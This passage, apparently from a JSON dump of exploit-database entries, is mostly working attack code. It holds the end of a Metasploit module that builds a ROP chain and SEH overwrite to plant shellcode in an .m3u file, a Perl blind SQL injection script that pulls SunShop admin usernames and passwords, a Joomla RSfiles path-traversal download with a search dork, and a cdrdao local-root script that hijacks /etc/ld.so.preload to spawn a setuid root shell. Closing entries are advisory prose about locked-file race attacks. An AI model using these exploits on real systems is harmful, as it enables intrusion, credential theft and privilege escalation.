RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << 
[0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n end\r\n \r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x10014548].pack('V') # XOR EAX,EAX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n \r\n rop << [target['VPOffset']].pack('V')\r\n \r\n if target['ASLR'] == true\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP #POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN\r\n end\r\n \r\n rop << [0x10019AA7].pack('V') # MOV DWORD PTR DS:[EDX],EAX # POP EDI # XOR EAX,EAX # POP EBP # ADD ESP,40 # RETN\r\n rop << \"A\" * 8\r\n rop << \"A\" * 64\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [0xffff95c8].pack('V') # negged shellcode offset\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop 
<< [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1001451E].pack('V') # ADD EAX,ECX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16 \r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xfffffc18].pack('V') # 0x3e8(1000].pack('V') negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xffffffc0].pack('V') # 
0x40 negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n rop << [0x1002FE81].pack('V') # XCHG EAX,ESP # RETN\r\n \r\n junk = rand_text_alpha_upper(target['Offset2']) #needed because of ADD ESP,4404 # RETN\r\n junktoseh = rand_text_alpha_upper(target['Offset'] - junk.length - rop.length)\r\n seh = [0x100177EA].pack('V') #ADD ESP,4404 # RETN\r\n nops = \"\\x90\" * 24\r\n shellspace = rand_text_alpha_upper(1000 - payload.encoded.length)\r\n m3ufile = junk + rop + junktoseh + seh + nops + payload.encoded + shellspace\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(m3ufile)\r\n \r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13319"}, {"lastseen": "2018-01-05T19:04:49", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-25T00:00:00", "published": "2007-08-25T00:00:00", "id": "1337DAY-ID-2086", "href": "https://0day.today/exploit/description/2086", "type": "zdt", "title": "SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit", "sourceData": 
"============================================================\r\nSunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n -----------------oOO---(_)---OOo------------------\";\r\n print \"\\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |\";\r\n print \"\\n | k1tk4t - Indonesia |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------\";\r\n print \"\\n[!] Vendor: http://www.turnkeywebtools.com\";\r\n print \"\\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter\";\r\n print \"\\n[!] Solution: install v4.0.1\";\r\n print \"\\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins\";\r\n print \"\\n[!] Options:\";\r\n print \"\\n -i [no] Valid User-ID, default is 1\";\r\n print \"\\n -c [no] Valid Category-ID with products, default is 1\";\r\n print \"\\n -o [no] 1 = get username (default)\";\r\n print \"\\n 2 = get password\";\r\n print \"\\n -t [name] Changes the admin table name, default is admins\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $user = 1;\r\nmy $cat = 1;\r\nmy $column = \"username\";\r\nmy $table = \"admins\";\r\nmy %options = ();\r\nGetOptions(\\%options, \"i=i\", \"c=i\", \"o=i\", \"t=s\", \"p=s\");\r\n\r\nprint \"[!] 
Exploiting...\\n\";\r\n\r\nif($options{\"i\"}) { $user = $options{\"i\"}; }\r\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\r\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"password\"; }\r\nif($options{\"t\"}) { $table = $options{\"t\"}; }\r\n\r\nsyswrite(STDOUT, \"data:\", 5);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $found = 0;\r\n my $h = 48;\r\n while(!$found && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$found)\r\n {\r\n $h = 97;\r\n while(!$found && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $table = shift;\r\n my $uid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $url = \"http://\".$host.$path.\"index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=\".$cat.\")%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20WHERE%20id=\".$uid.\"),\".$i.\",1)=CHAR(\".$h.\")/*\";\r\n\r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n\r\n my $response = $ua->get($url);\r\n my $content = $response->content;\r\n my $regexp = \"Add To Cart\";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2086"}, {"lastseen": "2018-04-11T11:50:46", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-23T00:00:00", "published": "2007-08-23T00:00:00", "id": "1337DAY-ID-2082", "href": "https://0day.today/exploit/description/2082", "type": "zdt", "title": "Joomla 
Component RSfiles <= 1.0.2 (path) File Download Vulnerability", "sourceData": "====================================================================\r\nJoomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n*******************************************************************************\r\n# Title : Joomla Component RSfiles <= 1.0.2 (path) Remote File Download Vulnerability\r\n# Author : ajann\r\n# Contact : :(\r\n# S.Page : http://www.rsjoomla.com\r\n# $$ : 10 $\r\n# Dork : inurl:\"/index.php?option=com_rsfiles\"\r\n# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=\r\n\r\n*******************************************************************************\r\n\r\n[[Remote File]]]---------------------------------------------------------\r\n\r\nhttp://[target]/[path]//index.php?option=com_rsfiles&task=files.display&path=[File]\r\n\r\nExample:\r\n\r\n//index.php?option=com_rsfiles&task=files.display&path=..|index.php\r\n//index.php?option=com_rsfiles&task=files.display&path=..|..| etc..\r\n\r\n[[/Remote File]]\r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n# ajann,Turkey\r\n# ...\r\n\r\n# Im not Hacker!\r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2082"}, {"lastseen": "2018-01-27T01:08:57", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2004-09-07T00:00:00", "published": "2004-09-07T00:00:00", "id": "1337DAY-ID-7357", "href": "https://0day.today/exploit/description/7357", "type": "zdt", "title": "CDRDAO Local Root Exploit", "sourceData": "=========================\r\nCDRDAO Local Root Exploit\r\n=========================\r\n\r\n\r\n#!/bin/sh\r\nDIR=`pwd`\r\necho \"\"\r\necho \"cdrdao local root exploit - gr doesn't protect you this time\"\r\necho \"Karol 
Wi?sek <appelast*drumnbass.art.pl>\"\r\necho \"\"\r\nsleep 2\r\numask 000\r\necho -n \"[*] Checking if /etc/ld.so.preload doesn't exist ... \"\r\nif [ -f /etc/ld.so.preload ]; then\r\necho \"WRONG\"\r\necho \"/etc/ld.so.preload exists, write another exploit ;P\"\r\nexit\r\nelse\r\necho \"OK\"\r\nfi\r\necho -n \"[*] Checking if su is setuid ... \"\r\nif [ -u /bin/su ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Creating evil *uid() library ... \"\r\ncat > getuid_lib.c << _EOF\r\nint getuid(void) {\r\nreturn 0; }\r\n_EOF\r\ngcc -o getuid_lib.o -c getuid_lib.c\r\nld -shared -o getuid_lib.so getuid_lib.o\r\nrm -f getuid_lib.c getuid_lib.o\r\nif [ -f ./getuid_lib.so ]; then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nfi\r\necho -n \"[*] Creating suidshell ... \"\r\ncat > suid.c << _EOF\r\nint main(void) {\r\nsetgid(0); setuid(0);\r\nunlink(\"./suid\");\r\nexecl(\"/bin/sh\",\"sh\",0); }\r\n_EOF\r\ngcc -o suid suid.c\r\nrm -f suid.c\r\nif [ -x ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Exploiting cdrdao ... \"\r\nln -sf /etc/ld.so.preload $HOME/.cdrdao\r\nif [ ! -L $HOME/.cdrdao ];then\r\necho \"Could'n link to \\$HOME/.cdrdao\"\r\nexit\r\nfi\r\ncdrdao unlock --save 2>/dev/null\r\n>/etc/ld.so.preload\r\necho \"$DIR/getuid_lib.so\" > /etc/ld.so.preload\r\nsu - -c \"rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid\"\r\nif [ -s ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\nrm -f getuid_lib.so\r\nunlink $HOME/.cdrdao\r\necho \"Entering rootshell ... ;]\"\r\n./suid\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7357"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "During file operations conditions exist for attacker to gain access to content of protected or locked files. 
It's also possible to create unmanageble file.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7357", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7357", "title": "Microsoft Windows files and folders management problems", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nHello lists, hello Roger. It's me again.\r\n\r\nSorry for annoyance, but there is one more attack vector with pre-open\r\nfiles I meant, but forgot to mention. It seems dangerous enough and need\r\nto be investigated for different applications. Attack is against\r\napplication relying on mandatory locks.\r\n\r\nAttack scenario:\r\n\r\n1. Alice pre-opens some Document and awaits Bob to open it. Document is\r\nsafe to open (text file, video file, business application format, etc).\r\nAlso, like in case of Microsoft Word it can be temporary file.\r\n2. Bob opens Document with some Application.\r\n3. Application locks file and reads or writes some data\r\n4. Alice modifies data\r\n5. Application reads previously accessed data. Because application\r\nrelies on the fact data can not be modified in locked file, this data is\r\nnot validated. It can lead to the problems like buffer overflows and to\r\nability to modify execution flow and to arbitrary code execution.\r\n\r\nWhat can be instead of Application? Any application to process user\r\nsupplied file which locks this file during processing.\r\n\r\nExamples are: Microsoft Office applications, video/audio players, etc. I\r\nexpect huge number of applications are vulnerable and will be grateful\r\nto everyone who can help me to find this kind of vulnerabilities\r\nin-the-wild, because this kind of vulnerability is not trivial and hard\r\nto catch without source code analysis.\r\n\r\n-- \r\nhttp://securityvulns.com/\r\n /\_/\\r\n { , . 
} |\\r\n+--oQQo->{ ^ }<-----+ \\r\n| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)\r\n+-------------o66o--+ /\r\n |/", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:DOC:16304", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16304", "title": "Pre-open files attack agains locked file", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}